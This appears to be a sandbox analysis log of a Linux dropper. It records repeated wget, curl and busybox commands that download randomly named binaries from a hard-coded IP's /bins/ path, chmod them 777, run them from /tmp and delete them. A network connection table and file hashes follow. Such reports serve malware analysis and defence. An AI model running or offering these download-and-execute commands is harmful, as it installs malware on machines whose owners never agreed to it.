/tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV

[./R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]

/bin/rm

[rm R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]

/usr/bin/wget

[wget http://87.120.84.230/bins/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]

/bin/chmod

[chmod 777 NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]

/tmp/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby

[./NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]

/bin/rm

[rm NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]

/usr/bin/wget

[wget http://87.120.84.230/bins/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]

/bin/chmod

[chmod 777 LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]

/tmp/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA

[./LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]

/bin/rm

[rm LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]

/usr/bin/wget

[wget http://87.120.84.230/bins/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]

/bin/chmod

[chmod 777 yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]

/tmp/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D

[./yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]

/bin/rm

[rm yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]

/usr/bin/wget

[wget http://87.120.84.230/bins/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]

/bin/chmod

[chmod 777 5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]

/tmp/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif

[./5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]

/bin/rm

[rm 5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]

/usr/bin/wget

[wget http://87.120.84.230/bins/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]

/bin/chmod

[chmod 777 GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]

/tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb

[./GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]

/bin/rm

[rm GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]

/usr/bin/wget

[wget http://87.120.84.230/bins/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]

/bin/chmod

[chmod 777 pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]

/tmp/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe

[./pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]

/bin/rm

[rm pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]

/usr/bin/wget

[wget http://87.120.84.230/bins/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]

/bin/chmod

[chmod 777 4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]

/tmp/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK

[./4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]

/bin/rm

[rm 4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]

/usr/bin/wget

[wget http://87.120.84.230/bins/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]

/bin/chmod

[chmod 777 NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]

/tmp/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68

[./NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]

/bin/rm

[rm NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]

/usr/bin/wget

[wget http://87.120.84.230/bins/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]

/bin/chmod

[chmod 777 b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]

/tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem

[./b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]

/bin/rm

[rm b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]

/usr/bin/wget

[wget http://87.120.84.230/bins/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]

/bin/chmod

[chmod 777 V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]

/tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj

[./V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]

/bin/rm

[rm V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]

Network

Country Destination Domain Proto
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp

Files

/tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97